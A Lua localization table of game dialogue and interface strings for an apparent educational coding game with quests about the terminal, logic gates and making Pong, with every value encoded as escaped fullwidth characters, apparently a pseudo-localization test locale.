["villageSummercampBoy2"] = "\239\188\169 \239\189\140\239\189\143\239\189\150\239\189\133 \239\189\148\239\189\136\239\189\133 \239\188\173\239\189\149\239\189\147\239\189\133\239\189\149\239\189\141 \239\189\143\239\189\134 \239\188\173\239\189\129\239\189\139\239\189\133 \239\188\161\239\189\146\239\189\148. \239\188\169 \239\189\146\239\189\133\239\189\129\239\189\140\239\189\140\239\189\153 \239\189\136\239\189\143\239\189\144\239\189\133 \239\189\143\239\189\142\239\189\133 \239\189\143\239\189\134 \239\189\141\239\189\153 \239\189\131\239\189\146\239\189\133\239\189\129\239\189\148\239\189\137\239\189\143\239\189\142\239\189\147 \239\189\137\239\189\147 \239\188\179\239\189\148\239\189\129\239\189\134\239\189\134 \239\188\176\239\189\137\239\189\131\239\189\139\239\189\133\239\189\132 \239\189\129\239\189\142\239\189\132 \239\189\134\239\189\146\239\189\129\239\189\141\239\189\133\239\189\132 \239\189\143\239\189\142 \239\189\148\239\189\136\239\189\133 \239\189\151\239\189\129\239\189\140\239\189\140\239\189\147.",
["stepComplete"] = "\239\188\179\239\189\148\239\189\133\239\189\144 $1/$2 \239\189\131\239\189\143\239\189\141\239\189\144\239\189\140\239\189\133\239\189\148\239\189\133",
["plains01Sign"] = "\239\188\168\239\188\164 \239\188\168\239\189\137\239\189\140\239\189\140 \239\188\161\239\189\136\239\189\133\239\189\129\239\189\132",
["terminalQuestHelp3"] = "\239\188\180\239\189\129\239\189\140\239\189\139 \239\189\148\239\189\143 \239\188\163\239\189\129\239\189\146\239\189\143\239\189\140\239\189\137\239\189\142\239\189\133 \239\189\137\239\189\142 \239\188\165\239\189\148\239\189\136\239\189\133\239\189\146 \239\188\179\239\189\148 \239\188\179\239\189\148\239\189\129\239\189\148\239\189\137\239\189\143\239\189\142.",
["terminalQuestHelp2"] = "\239\188\163\239\189\143\239\189\141\239\189\144\239\189\140\239\189\133\239\189\148\239\189\133 \239\189\131\239\189\136\239\189\129\239\189\140\239\189\140\239\189\133\239\189\142\239\189\135\239\189\133 8 \239\189\137\239\189\142 \239\188\180\239\189\133\239\189\146\239\189\141\239\189\137\239\189\142\239\189\129\239\189\140 \239\188\177\239\189\149\239\189\133\239\189\147\239\189\148.",
["terminalQuestHelp1"] = "\239\188\180\239\189\129\239\189\140\239\189\139 \239\189\148\239\189\143 \239\188\163\239\189\129\239\189\146\239\189\143\239\189\140\239\189\137\239\189\142\239\189\133 \239\189\137\239\189\142 \239\188\165\239\189\148\239\189\136\239\189\133\239\189\146 \239\188\179\239\189\148 \239\188\179\239\189\148\239\189\129\239\189\148\239\189\137\239\189\143\239\189\142.",
["tempLaunchWifiConfig"] = "\239\188\172\239\189\129\239\189\149\239\189\142\239\189\131\239\189\136 \239\188\179\239\189\133\239\189\148\239\189\148\239\189\137\239\189\142\239\189\135\239\189\147",
["LogicLakeNerdQuest2"] = "\239\188\185\239\189\143\239\189\149 \239\189\134\239\189\137\239\189\142\239\189\132 \239\189\129 \239\189\130\239\189\143\239\189\143\239\189\139 \239\189\143\239\189\142 \239\188\161\239\189\140\239\189\135\239\189\143\239\189\146\239\189\137\239\189\148\239\189\136\239\189\141\239\189\147. \239\188\169\239\189\148 \239\189\146\239\189\133\239\189\129\239\189\132\239\189\147: \239\188\183\239\189\133 \239\189\149\239\189\147\239\189\133 \239\189\131\239\189\143\239\189\132\239\189\133 \239\189\148\239\189\143 \239\189\135\239\189\137\239\189\150\239\189\133 \239\189\131\239\189\143\239\189\141\239\189\144\239\189\149\239\189\148\239\189\133\239\189\146\239\189\147 \239\189\147\239\189\148\239\189\133\239\189\144-\239\189\130\239\189\153-\239\189\147\239\189\148\239\189\133\239\189\144 \239\189\137\239\189\142\239\189\147\239\189\148\239\189\146\239\189\149\239\189\131\239\189\148\239\189\137\239\189\143\239\189\142\239\189\147.",
["LogicLakeNerdQuest1"] = "\239\188\185\239\189\143\239\189\149 \239\189\134\239\189\137\239\189\142\239\189\132 \239\189\129 \239\189\147\239\189\133\239\189\131\239\189\146\239\189\133\239\189\148 \239\189\147\239\189\131\239\189\146\239\189\143\239\189\140\239\189\140 \239\189\143\239\189\142 \239\189\131\239\189\143\239\189\132\239\189\133: \239\188\169\239\189\148 \239\189\146\239\189\133\239\189\129\239\189\132\239\189\147: \239\188\161 \239\189\144\239\189\146\239\189\143\239\189\135\239\189\146\239\189\129\239\189\141 \239\189\148\239\189\149\239\189\146\239\189\142\239\189\147 \239\189\136\239\189\149\239\189\141\239\189\129\239\189\142 \239\189\151\239\189\143\239\189\146\239\189\132\239\189\147 \239\189\137\239\189\142\239\189\148\239\189\143 1\239\189\147 \239\189\129\239\189\142\239\189\132 0\239\189\147. \239\188\180\239\189\136\239\189\137\239\189\147 \239\189\137\239\189\147 \239\189\131\239\189\129\239\189\140\239\189\140\239\189\133\239\189\132 \239\189\131\239\189\143\239\189\132\239\189\133.",
["close"] = "\239\188\163\239\189\140\239\189\143\239\189\147\239\189\133",
["cOS"] = "\239\188\180\239\189\136\239\189\133 \239\189\140\239\189\143\239\189\151-\239\189\140\239\189\133\239\189\150\239\189\133\239\189\140 \239\189\147\239\189\143\239\189\134\239\189\148\239\189\151\239\189\129\239\189\146\239\189\133 \239\189\148\239\189\136\239\189\129\239\189\148 \239\189\147\239\189\149\239\189\144\239\189\144\239\189\143\239\189\146\239\189\148\239\189\147 \239\189\148\239\189\136\239\189\133 \239\189\131\239\189\143\239\189\141\239\189\144\239\189\149\239\189\148\239\189\133\239\189\146 \239\189\148\239\189\143 \239\189\131\239\189\129\239\189\146\239\189\146\239\189\153 \239\189\143\239\189\149\239\189\148 \239\189\137\239\189\142\239\189\147\239\189\148\239\189\146\239\189\149\239\189\131\239\189\148\239\189\137\239\189\143\239\189\142\239\189\147 \239\189\129\239\189\142\239\189\132 \239\189\131\239\189\143\239\189\142\239\189\148\239\189\146\239\189\143\239\189\140 \239\189\143\239\189\148\239\189\136\239\189\133\239\189\146 \239\189\132\239\189\133\239\189\150\239\189\137\239\189\131\239\189\133\239\189\147.",
["sunburntDiag"] = "\239\188\169'\239\189\150\239\189\133 \239\189\138\239\189\149\239\189\147\239\189\148 \239\189\131\239\189\143\239\189\141\239\189\133 \239\189\134\239\189\146\239\189\143\239\189\141 \239\189\148\239\189\136\239\189\133 \239\188\162\239\189\140\239\189\143\239\189\131\239\189\139 \239\188\173\239\189\137\239\189\142\239\189\133\239\189\147, \239\189\151\239\189\136\239\189\133\239\189\146\239\189\133 \239\188\169 \239\189\140\239\189\133\239\189\129\239\189\146\239\189\142\239\189\148 \239\189\142\239\189\133\239\189\151 \239\189\147\239\189\149\239\189\144\239\189\133\239\189\146 \239\189\144\239\189\143\239\189\151\239\189\133\239\189\146\239\189\147 \239\189\148\239\189\136\239\189\129\239\189\148 \239\189\131\239\189\143\239\189\142\239\189\148\239\189\146\239\189\143\239\189\140 \239\188\173\239\189\137\239\189\142\239\189\133\239\189\131\239\189\146\239\189\129\239\189\134\239\189\148!",
["powerQuestHelp"] = "\239\188\166\239\189\143\239\189\140\239\189\140\239\189\143\239\189\151 \239\189\148\239\189\136\239\189\133 \239\189\151\239\189\136\239\189\137\239\189\148\239\189\133 \239\189\146\239\189\129\239\189\130\239\189\130\239\189\137\239\189\148 \239\189\132\239\189\143\239\189\151\239\189\142 \239\189\148\239\189\136\239\189\133 \239\188\176\239\189\143\239\189\151\239\189\133\239\189\146 \239\188\176\239\189\129\239\189\148\239\189\136.",
["jungleQuizOption3a"] = "\239\188\173\239\189\143\239\189\148\239\189\137\239\189\143\239\189\142 \239\188\182\239\189\137\239\189\132\239\189\133\239\189\143",
["jungleQuizOption3b"] = "\239\188\173\239\189\143\239\189\150\239\189\133",
["powerQuest"] = "\239\188\176\239\188\175\239\188\183 \239\189\153\239\189\143\239\189\149 \239\189\141\239\189\129\239\189\132\239\189\133 \239\189\137\239\189\148! \239\188\169'\239\189\141 \239\189\137\239\189\142 \239\188\163\239\188\168\239\188\161\239\188\178\239\188\167\239\188\165 \239\189\143\239\189\134 \239\189\141\239\189\143\239\189\142\239\189\137\239\189\148\239\189\143\239\189\146\239\189\137\239\189\142\239\189\135 \239\189\148\239\189\136\239\189\133 \239\189\144\239\189\143\239\189\151\239\189\133\239\189\146 \239\189\140\239\189\133\239\189\150\239\189\133\239\189\140\239\189\147. \239\188\183\239\189\136\239\189\133\239\189\142 \239\189\148\239\189\136\239\189\133 \239\189\146\239\189\133\239\189\132 \239\189\140\239\189\137\239\189\135\239\189\136\239\189\148 \239\189\137\239\189\147 \239\189\143\239\189\142, \239\189\151\239\189\133 \239\189\139\239\189\142\239\189\143\239\189\151 \239\189\148\239\189\136\239\189\129\239\189\148 \239\189\148\239\189\136\239\189\133\239\189\146\239\189\133 \239\189\137\239\189\147 \239\189\133\239\189\142\239\189\133\239\189\146\239\189\135\239\189\153 \239\189\134\239\189\140\239\189\143\239\189\151\239\189\137\239\189\142\239\189\135 \239\189\137\239\189\142\239\189\148\239\189\143 \239\189\148\239\189\136\239\189\133 \239\189\131\239\189\143\239\189\141\239\189\144\239\189\149\239\189\148\239\189\133\239\189\146.",
["powerMissWatts"] = "\239\188\169'\239\189\141 \239\189\137\239\189\142 \239\188\163\239\188\168\239\188\161\239\188\178\239\188\167\239\188\165 \239\189\143\239\189\134 \239\189\141\239\189\143\239\189\142\239\189\137\239\189\148\239\189\143\239\189\146\239\189\137\239\189\142\239\189\135 \239\189\148\239\189\136\239\189\133 \239\189\144\239\189\143\239\189\151\239\189\133\239\189\146 \239\189\140\239\189\133\239\189\150\239\189\133\239\189\140\239\189\147. \239\188\183\239\189\136\239\189\133\239\189\142 \239\189\148\239\189\136\239\189\133 \239\189\146\239\189\133\239\189\132 \239\189\140\239\189\137\239\189\135\239\189\136\239\189\148 \239\189\137\239\189\147 \239\189\143\239\189\142, \239\189\151\239\189\133 \239\189\139\239\189\142\239\189\143\239\189\151 \239\189\148\239\189\136\239\189\129\239\189\148 \239\189\148\239\189\136\239\189\133\239\189\146\239\189\133 \239\189\137\239\189\147 \239\189\133\239\189\142\239\189\133\239\189\146\239\189\135\239\189\153 \239\189\134\239\189\140\239\189\143\239\189\151\239\189\137\239\189\142\239\189\135 \239\189\137\239\189\142\239\189\148\239\189\143 \239\189\148\239\189\136\239\189\133 \239\189\131\239\189\143\239\189\141\239\189\144\239\189\149\239\189\148\239\189\133\239\189\146. \239\188\163\239\189\136\239\189\133\239\189\131\239\189\139 \239\189\143\239\189\149\239\189\148 \239\189\148\239\189\136\239\189\133 \239\189\140\239\189\137\239\189\135\239\189\136\239\189\148!",
["jungleWildAntlerBoy"] = "\239\188\183\239\189\133 \239\189\132\239\189\143\239\189\142'\239\189\148 \239\189\149\239\189\147\239\189\149\239\189\129\239\189\140\239\189\140\239\189\153 \239\189\135\239\189\133\239\189\148 \239\189\144\239\189\133\239\189\143\239\189\144\239\189\140\239\189\133 \239\189\130\239\189\146\239\189\129\239\189\150\239\189\133 \239\189\133\239\189\142\239\189\143\239\189\149\239\189\135\239\189\136 \239\189\148\239\189\143 \239\189\131\239\189\143\239\189\141\239\189\133 \239\189\136\239\189\133\239\189\146\239\189\133. \239\188\164\239\189\143 \239\189\153\239\189\143\239\189\149 \239\189\139\239\189\142\239\189\143\239\189\151 \239\189\151\239\189\136\239\189\129\239\189\148 \239\188\172\239\188\179 \239\189\141\239\189\133\239\189\129\239\189\142\239\189\147 \239\189\137\239\189\142 \239\189\148\239\189\133\239\189\146\239\189\141\239\189\137\239\189\142\239\189\129\239\189\140?",
["cOutputTitle"] = "\239\188\175\239\189\149\239\189\148\239\189\144\239\189\149\239\189\148",
["llMaster"] = "\239\188\169'\239\189\141 \239\188\173\239\189\143\239\189\147\239\189\134\239\189\133\239\189\148, \239\188\172\239\189\143\239\189\135\239\189\137\239\189\131 \239\188\173\239\189\129\239\189\147\239\189\148\239\189\133\239\189\146. \239\188\183\239\189\136\239\189\129\239\189\148 \239\189\129\239\189\146\239\189\133 \239\189\140\239\189\143\239\189\135\239\189\137\239\189\131 \239\189\135\239\189\129\239\189\148\239\189\133\239\189\147? \239\188\175\239\189\142\239\189\140\239\189\153 \239\189\148\239\189\136\239\189\133 \239\189\130\239\189\149\239\189\137\239\189\140\239\189\132\239\189\137\239\189\142\239\189\135 \239\189\130\239\189\140\239\189\143\239\189\131\239\189\139\239\189\147 \239\189\143\239\189\134 \239\189\132\239\189\137\239\189\135\239\189\137\239\189\148\239\189\129\239\189\140 \239\189\131\239\189\143\239\189\141\239\189\144\239\189\149\239\189\148\239\189\133\239\189\146\239\189\147!",
["makeArt"] = "\239\188\173\239\189\129\239\189\139\239\189\133 \239\188\161\239\189\146\239\189\148",
["cFrequencyTitle"] = "\239\188\166\239\189\146\239\189\133\239\189\145\239\189\149\239\189\133\239\189\142\239\189\131\239\189\153",
["devEmily"] = "\239\188\169'\239\189\141 \239\188\171\239\189\129\239\189\142\239\189\143'\239\189\147 \239\189\132\239\189\129\239\189\148\239\189\129\239\189\130\239\189\129\239\189\147\239\189\133 \239\189\148\239\189\136\239\189\129\239\189\148 \239\189\137\239\189\147 \239\189\143\239\189\130\239\189\147\239\189\133\239\189\147\239\189\147\239\189\133\239\189\132 \239\189\151\239\189\137\239\189\148\239\189\136 \239\189\141\239\189\129\239\189\139\239\189\137\239\189\142\239\189\135 \239\189\131\239\189\136\239\189\129\239\189\146\239\189\129\239\189\131\239\189\148\239\189\133\239\189\146\239\189\147. \239\188\169 \239\189\129\239\189\140\239\189\147\239\189\143 \239\189\147\239\189\136\239\189\137\239\189\144 \239\189\141\239\189\129\239\189\142\239\189\153 \239\189\148\239\189\136\239\189\137\239\189\142\239\189\135\239\189\147.",
["llMaster3"] = "\239\188\167\239\189\143\239\189\143\239\189\132 \239\189\140\239\189\149\239\189\131\239\189\139 \239\189\143\239\189\142 \239\189\153\239\189\143\239\189\149\239\189\146 \239\189\138\239\189\143\239\189\149\239\189\146\239\189\142\239\189\133\239\189\153. \239\188\171\239\189\133\239\189\133\239\189\144 \239\189\133\239\189\152\239\189\144\239\189\140\239\189\143\239\189\146\239\189\137\239\189\142\239\189\135 \239\189\129\239\189\142\239\189\132 \239\189\140\239\189\133\239\189\150\239\189\133\239\189\140\239\189\137\239\189\142\239\189\135 \239\189\149\239\189\144.",
["llMaster2"] = "\239\188\172\239\189\143\239\189\135\239\189\137\239\189\131 \239\189\135\239\189\129\239\189\148\239\189\133\239\189\147 \239\189\148\239\189\129\239\189\139\239\189\133 1\239\189\147 \239\189\129\239\189\142\239\189\132 0\239\189\147 \239\189\137\239\189\142 \239\189\129\239\189\142\239\189\132 \239\189\143\239\189\149\239\189\148\239\189\144\239\189\149\239\189\148 \239\189\129 \239\189\147\239\189\137\239\189\142\239\189\135\239\189\140\239\189\133 1 \239\189\143\239\189\146 0. \239\188\163\239\189\143\239\189\142\239\189\142\239\189\133\239\189\131\239\189\148 \239\189\141\239\189\129\239\189\142\239\189\153 \239\189\140\239\189\143\239\189\135\239\189\137\239\189\131 \239\189\135\239\189\129\239\189\148\239\189\133\239\189\147 \239\189\148\239\189\143\239\189\135\239\189\133\239\189\148\239\189\136\239\189\133\239\189\146 \239\189\129\239\189\142\239\189\132 \239\189\153\239\189\143\239\189\149 \239\189\136\239\189\129\239\189\150\239\189\133 \239\189\129 \239\189\147\239\189\133\239\189\146\239\189\137\239\189\133\239\189\147 \239\189\143\239\189\134 \239\189\137\239\189\142\239\189\147\239\189\148\239\189\146\239\189\149\239\189\131\239\189\148\239\189\137\239\189\143\239\189\142\239\189\147 \239\189\134\239\189\143\239\189\146 \239\189\129\239\189\142\239\189\153\239\189\148\239\189\136\239\189\137\239\189\142\239\189\135.",
["mehTemp"] = "\239\188\174\239\189\143 \239\189\148\239\189\136\239\189\129\239\189\142\239\189\139\239\189\147",
["pongQuestTitle"] = "\239\188\169\239\189\142\239\189\148\239\189\146\239\189\143 \239\189\148\239\189\143 \239\188\173\239\189\129\239\189\139\239\189\133 \239\188\176\239\189\143\239\189\142\239\189\135",
["logic"] = "\239\188\183\239\189\136\239\189\129\239\189\148 \239\189\129\239\189\146\239\189\133 \239\188\172\239\189\143\239\189\135\239\189\137\239\189\131 \239\188\167\239\189\129\239\189\148\239\189\133\239\189\147?",
["Yes"] = "\239\188\185\239\189\133\239\189\147",
["minecraftQuestTitle"] = "\239\188\164\239\189\137\239\189\147\239\189\131\239\189\143\239\189\150\239\189\133\239\189\146 \239\189\142\239\189\133\239\189\151 \239\189\144\239\189\143\239\189\151\239\189\133\239\189\146\239\189\147",
["portetherMayorQuestComplete"] = "\239\188\164\239\189\137\239\189\147\239\189\131\239\189\143\239\189\150\239\189\133\239\189\146\239\189\133\239\189\132 \239\189\148\239\189\151\239\189\143 \239\189\136\239\189\143\239\189\149\239\189\147\239\189\133\239\189\147 \239\189\148\239\189\136\239\189\129\239\189\148 \239\189\136\239\189\129\239\189\132 \239\189\132\239\189\129\239\189\148\239\189\129 \239\189\131\239\189\143\239\189\146\239\189\146\239\189\149\239\189\144\239\189\148\239\189\137\239\189\143\239\189\142. \239\188\166\239\189\143\239\189\149\239\189\142\239\189\132 \239\189\142\239\189\143\239\189\148\239\189\133\239\189\147 \239\189\148\239\189\136\239\189\129\239\189\148 \239\189\136\239\189\129\239\189\132 \239\189\148\239\189\136\239\189\133 \239\189\131\239\189\143\239\189\141\239\189\141\239\189\129\239\189\142\239\189\132\239\189\147 \239\188\173\239\188\182 \239\189\129\239\189\142\239\189\132 \239\188\178\239\188\173.",
["cInputTitle"] = "\239\188\169\239\189\142\239\189\144\239\189\149\239\189\148",
["village02DoorSign"] = "\239\188\173\239\189\149\239\189\147\239\189\133\239\189\149\239\189\141 \239\189\143\239\189\134 \239\188\173\239\189\129\239\189\139\239\189\133 \239\188\161\239\189\146\239\189\148 - \239\188\163\239\188\172\239\188\175\239\188\179\239\188\165\239\188\164 - \239\188\183\239\189\129\239\189\137\239\189\148\239\189\137\239\189\142\239\189\135 \239\189\134\239\189\143\239\189\146 \239\189\134\239\189\149\239\189\146\239\189\148\239\189\136\239\189\133\239\189\146 \239\188\173\239\189\129\239\189\139\239\189\133 \239\188\161\239\189\146\239\189\148 \239\189\131\239\189\146\239\189\133\239\189\129\239\189\148\239\189\137\239\189\143\239\189\142\239\189\147",
["mrInfoDiag1"] = "\239\188\164\239\189\137\239\189\132 \239\189\153\239\189\143\239\189\149 \239\189\139\239\189\142\239\189\143\239\189\151 \239\188\179\239\188\164 \239\188\162\239\189\133\239\189\129\239\189\131\239\189\136 \239\189\137\239\189\147 \239\189\130\239\189\149\239\189\137\239\189\140\239\189\148 \239\189\143\239\189\142 \239\189\129 \239\189\141\239\189\137\239\189\131\239\189\146\239\189\143 \239\188\179\239\188\164 \239\189\131\239\189\129\239\189\146\239\189\132? \239\188\162\239\189\133\239\189\140\239\189\143\239\189\151 \239\189\129\239\189\146\239\189\133 \239\189\148\239\189\133\239\189\133\239\189\142\239\189\153 \239\189\148\239\189\137\239\189\142\239\189\153 \239\189\133\239\189\140\239\189\133\239\189\131\239\189\148\239\189\146\239\189\143\239\189\142\239\189\137\239\189\131 \239\189\131\239\189\136\239\189\137\239\189\144\239\189\147 \239\189\148\239\189\136\239\189\129\239\189\148 \239\189\146\239\189\133\239\189\141\239\189\133\239\189\141\239\189\130\239\189\133\239\189\146 \239\189\153\239\189\143\239\189\149\239\189\146 \239\189\141\239\189\129\239\189\147\239\189\148\239\189\133\239\189\146\239\189\144\239\189\137\239\189\133\239\189\131\239\189\133\239\189\147, \239\189\133\239\189\150\239\189\133\239\189\142 \239\189\151\239\189\136\239\189\133\239\189\142 \239\189\153\239\189\143\239\189\149\239\189\146 \239\189\131\239\189\143\239\189\141\239\189\144\239\189\149\239\189\148\239\189\133\239\189\146 \239\189\137\239\189\147 \239\189\148\239\189\149\239\189\146\239\189\142\239\189\133\239\189\132 \239\189\143\239\189\134\239\189\134. \239\188\163\239\189\136\239\189\133\239\189\131\239\189\139 \239\189\148\239\189\136\239\189\133 \239\189\141\239\189\129\239\189\144 \239\189\148\239\189\143 \239\189\147\239\189\133\239\189\133 \239\189\143\239\189\148\239\189\136\239\189\133\239\189\146 \239\189\144\239\189\129\239\189\146\239\189\148\239\189\147 \239\189\143\239\189\134 \239\189\148\239\189\136\239\189\133 \239\189\131\239\189\143\239\189\141\239\189\144\239\189\149\239\189\148\239\189\133\239\189\146.",
["cVectorTitle"] = "\239\188\182\239\189\133\239\189\131\239\189\148\239\189\143\239\189\146",
["cTerminalTitle"] = "\239\188\180\239\189\133\239\189\146\239\189\141\239\189\137\239\189\142\239\189\129\239\189\140",
["portetherCafeBoy"] = "\239\188\169 \239\189\151\239\189\143\239\189\142\239\189\132\239\189\133\239\189\146 \239\189\137\239\189\134 \239\188\163\239\189\143\239\189\134\239\189\134\239\189\133\239\189\133 \239\188\179\239\189\131\239\189\146\239\189\137\239\189\144\239\189\148 \239\189\137\239\189\147 \239\189\135\239\189\143\239\189\137\239\189\142\239\189\135 \239\189\148\239\189\143 \239\189\146\239\189\133\239\189\144\239\189\140\239\189\129\239\189\131\239\189\133 \239\188\170\239\189\129\239\189\150\239\189\129\239\189\147\239\189\131\239\189\146\239\189\137\239\189\144\239\189\148...",
["letsMake"] = "\239\188\172\239\189\133\239\189\148'\239\189\147 \239\189\141\239\189\129\239\189\139\239\189\133!",
["plainsBuilder"] = "\239\188\176\239\189\136\239\189\133\239\189\151, \239\188\169'\239\189\141 \239\189\133\239\189\152\239\189\136\239\189\129\239\189\149\239\189\147\239\189\148\239\189\133\239\189\132 \239\189\129\239\189\134\239\189\148\239\189\133\239\189\146 \239\189\151\239\189\143\239\189\146\239\189\139\239\189\137\239\189\142\239\189\135 \239\189\147\239\189\143 \239\189\136\239\189\129\239\189\146\239\189\132 \239\189\143\239\189\142 \239\189\148\239\189\136\239\189\133 \239\189\149\239\189\144\239\189\132\239\189\129\239\189\148\239\189\133. \239\188\180\239\189\136\239\189\133 \239\189\132\239\189\133\239\189\144\239\189\148\239\189\136\239\189\147 \239\189\143\239\189\134 \239\189\148\239\189\136\239\189\133 \239\188\178\239\188\161\239\188\173 \239\189\151\239\189\137\239\189\140\239\189\140 \239\189\130\239\189\133 \239\189\143\239\189\144\239\189\133\239\189\142 \239\189\148\239\189\143 \239\189\148\239\189\136\239\189\133 \239\189\144\239\189\149\239\189\130\239\189\140\239\189\137\239\189\131 \239\189\147\239\189\143\239\189\143\239\189\142!",
["LogicLakeMaster"] = "\239\188\173\239\189\143\239\189\147\239\189\134\239\189\133\239\189\148",
["makeArtQuiz3b"] = "\239\189\141\239\189\143\239\189\150\239\189\133\239\188\180\239\189\143",
["makeArtQuiz3a"] = "\239\189\141\239\189\143\239\189\150\239\189\133",
["backToDashboard"] = "\239\188\162\239\189\129\239\189\131\239\189\139 \239\189\148\239\189\143 \239\188\164\239\189\129\239\189\147\239\189\136\239\189\130\239\189\143\239\189\129\239\189\146\239\189\132",
["carolineTerminalQuest3"] = "\239\188\183\239\189\143\239\189\151, \239\189\129 \239\189\130\239\189\149\239\189\142\239\189\131\239\189\136 \239\189\143\239\189\134 \239\189\144\239\189\133\239\189\143\239\189\144\239\189\140\239\189\133 \239\189\134\239\189\146\239\189\143\239\189\141 \239\188\166\239\189\143\239\189\140\239\189\132\239\189\133\239\189\146\239\189\148\239\189\143\239\189\142 \239\189\136\239\189\129\239\189\150\239\189\133 \239\189\132\239\189\137\239\189\147\239\189\129\239\189\144\239\189\144\239\189\133\239\189\129\239\189\146\239\189\133\239\189\132? \239\188\180\239\189\136\239\189\129\239\189\148'\239\189\147 \239\189\131\239\189\146\239\189\129\239\189\154\239\189\153! \239\188\173\239\189\129\239\189\153\239\189\130\239\189\133 \239\189\153\239\189\143\239\189\149 \239\189\147\239\189\136\239\189\143\239\189\149\239\189\140\239\189\132 \239\189\148\239\189\133\239\189\140\239\189\140 \239\189\148\239\189\136\239\189\133 \239\188\173\239\189\129\239\189\153\239\189\143\239\189\146 \239\189\137\239\189\142 \239\188\176\239\189\143\239\189\146\239\189\148 \239\188\165\239\189\148\239\189\136\239\189\133\239\189\146?",
["carolineTerminalQuest2"] = "\239\188\176\239\189\140\239\189\133\239\189\129\239\189\147\239\189\133 \239\189\150\239\189\137\239\189\147\239\189\137\239\189\148 \239\188\166\239\189\143\239\189\140\239\189\132\239\189\133\239\189\146\239\189\148\239\189\143\239\189\142, \239\189\129\239\189\142\239\189\132 \239\189\141\239\189\129\239\189\139\239\189\133 \239\189\147\239\189\149\239\189\146\239\189\133 \239\189\153\239\189\143\239\189\149 \239\189\140\239\189\133\239\189\129\239\189\146\239\189\142 \239\189\147\239\189\143\239\189\141\239\189\133 \239\189\149\239\189\147\239\189\133\239\189\134\239\189\149\239\189\140 \239\189\147\239\189\144\239\189\133\239\189\140\239\189\140\239\189\147.",
["carolineTerminalQuest1"] = "\239\188\168\239\189\133\239\189\140\239\189\140\239\189\143! \239\188\168\239\189\129\239\189\150\239\189\133 \239\189\153\239\189\143\239\189\149 \239\189\136\239\189\133\239\189\129\239\189\146\239\189\132 \239\189\151\239\189\136\239\189\129\239\189\148'\239\189\147 \239\189\135\239\189\143\239\189\137\239\189\142\239\189\135 \239\189\143\239\189\142 \239\189\137\239\189\142 \239\188\166\239\189\143\239\189\140\239\189\132\239\189\133\239\189\146\239\189\148\239\189\143\239\189\142? \239\188\176\239\189\140\239\189\133\239\189\129\239\189\147\239\189\133 \239\189\149\239\189\147\239\189\133 \239\189\148\239\189\136\239\189\133 \239\189\131\239\189\143\239\189\141\239\189\144\239\189\149\239\189\148\239\189\133\239\189\146 \239\189\142\239\189\133\239\189\152\239\189\148 \239\189\148\239\189\143 \239\189\141\239\189\133 \239\189\148\239\189\143 \239\189\148\239\189\146\239\189\129\239\189\150\239\189\133\239\189\140 \239\189\148\239\189\136\239\189\133\239\189\146\239\189\133.",
["createArt"] = "\239\188\173\239\189\129\239\189\139\239\189\133 \239\189\129 \239\189\131\239\189\146\239\189\133\239\189\129\239\189\148\239\189\137\239\189\143\239\189\142",
["makePong"] = "\239\188\173\239\189\129\239\189\139\239\189\133 \239\188\176\239\189\143\239\189\142\239\189\135",
["cStereoTitle"] = "\239\188\179\239\189\148\239\189\133\239\189\146\239\189\133\239\189\143",
["jungleTildeDiag2"] = "\239\188\185\239\189\143\239\189\149 \239\189\147\239\189\148\239\189\137\239\189\140\239\189\140 \239\189\136\239\189\129\239\189\150\239\189\133 \239\189\129 \239\189\151\239\189\129\239\189\153\239\189\147 \239\189\148\239\189\143 \239\189\135\239\189\143 \239\189\130\239\189\133\239\189\134\239\189\143\239\189\146\239\189\133 \239\189\153\239\189\143\239\189\149 \239\189\129\239\189\146\239\189\133 \239\189\129\239\189\147 \239\189\135\239\189\143\239\189\143\239\189\132 \239\189\129\239\189\147 \239\189\149\239\189\147. \239\188\180\239\189\129\239\189\140\239\189\139 \239\189\148\239\189\143 \239\189\148\239\189\136\239\189\133 \239\189\131\239\189\136\239\189\137\239\189\133\239\189\134 \239\189\148\239\189\143 \239\189\144\239\189\140\239\189\129\239\189\153 \239\189\147\239\189\143\239\189\141\239\189\133 \239\188\179\239\189\142\239\189\129\239\189\139\239\189\133.",
["jungleTildeDiag3"] = "\239\188\175\239\189\136! \239\188\174\239\189\143\239\189\148 \239\189\136\239\189\129\239\189\140\239\189\134 \239\189\130\239\189\129\239\189\132 - \239\189\153\239\189\143\239\189\149 \239\189\129\239\189\146\239\189\133 \239\189\140\239\189\133\239\189\150\239\189\133\239\189\140 $1. \239\188\174\239\189\137\239\189\131\239\189\133 \239\189\143\239\189\142\239\189\133.",
["jungleTildeDiag1"] = "\239\188\183\239\189\133 \239\189\140\239\189\137\239\189\139\239\189\133 \239\189\148\239\189\143 \239\189\144\239\189\140\239\189\129\239\189\153 \239\189\151\239\189\137\239\189\148\239\189\136 \239\189\147\239\189\142\239\189\129\239\189\139\239\189\133\239\189\147 \239\189\129\239\189\142\239\189\132 \239\189\144\239\189\129\239\189\146\239\189\129\239\189\141\239\189\133\239\189\148\239\189\133\239\189\146\239\189\147. \239\188\172\239\189\133\239\189\148'\239\189\147 \239\189\147\239\189\133\239\189\133 \239\189\136\239\189\143\239\189\151 \239\189\135\239\189\143\239\189\143\239\189\132 \239\189\153\239\189\143\239\189\149 \239\189\129\239\189\146\239\189\133 \239\189\129\239\189\148 \239\189\148\239\189\136\239\189\143\239\189\147\239\189\133... \239\188\168\239\189\141\239\189\141\239\189\141 \239\189\131\239\189\136\239\189\129\239\189\140\239\189\140\239\189\133\239\189\142\239\189\135\239\189\133 $1.",
["momaFloorSign0"] = "\239\188\176\239\189\137\239\189\152\239\189\133\239\189\140 \239\188\168\239\189\129\239\189\131\239\189\139\239\189\133\239\189\146 \239\188\172\239\189\129\239\189\130",
["portether03houseNote"] = "\239\188\185\239\189\143\239\189\149 \239\189\134\239\189\137\239\189\142\239\189\132 \239\189\129 \239\189\142\239\189\143\239\189\148\239\189\133. \239\188\169\239\189\148 \239\189\136\239\189\129\239\189\147 \239\189\129 \239\189\147\239\189\131\239\189\146\239\189\137\239\189\130\239\189\130\239\189\140\239\189\133 \239\189\148\239\189\136\239\189\129\239\189\148 \239\189\147\239\189\129\239\189\153\239\189\147: \239\188\166\239\189\143\239\189\140\239\189\132\239\189\133\239\189\146\239\189\148\239\189\143\239\189\142 \239\188\172\239\189\137\239\189\130\239\189\146\239\189\129\239\189\146\239\189\153 > \239\188\176\239\189\143\239\189\146\239\189\148 \239\188\165\239\189\148\239\189\136\239\189\133\239\189\146 \239\188\172\239\189\137\239\189\130\239\189\146\239\189\129\239\189\146\239\189\153",
